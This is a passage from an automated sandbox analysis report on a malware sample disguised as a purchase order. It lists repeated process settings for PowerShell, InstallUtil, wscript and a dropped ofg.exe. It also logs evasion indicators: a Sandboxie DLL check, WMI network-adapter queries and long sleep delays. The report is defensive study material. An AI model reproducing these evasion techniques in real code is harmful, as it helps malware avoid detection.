                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: purchase order T&B19-20PO128.exe PID: 8136, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ofg.exe PID: 3932, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1390243265.000000000253F000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1630701486.00000000027CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeMemory allocated: BA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeMemory allocated: 4510000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeMemory allocated: 47A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 10F0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2DF0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1380000 memory reserve | memory write watch
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2954Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 991Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1635Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8189Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1319
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep count: 37 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7272Thread sleep count: 1635 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7272Thread sleep count: 8189 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -99641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -99531s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -99422s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -99311s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -99198s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -99085s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -98982s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -98838s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -98719s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -98610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -98485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -98360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -98235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -98110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -97985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -97860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -97735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -97610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -97485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -97360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -97235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -97110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -96985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -96860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7936Thread sleep time: -96735s >= -30000sJump to behavior
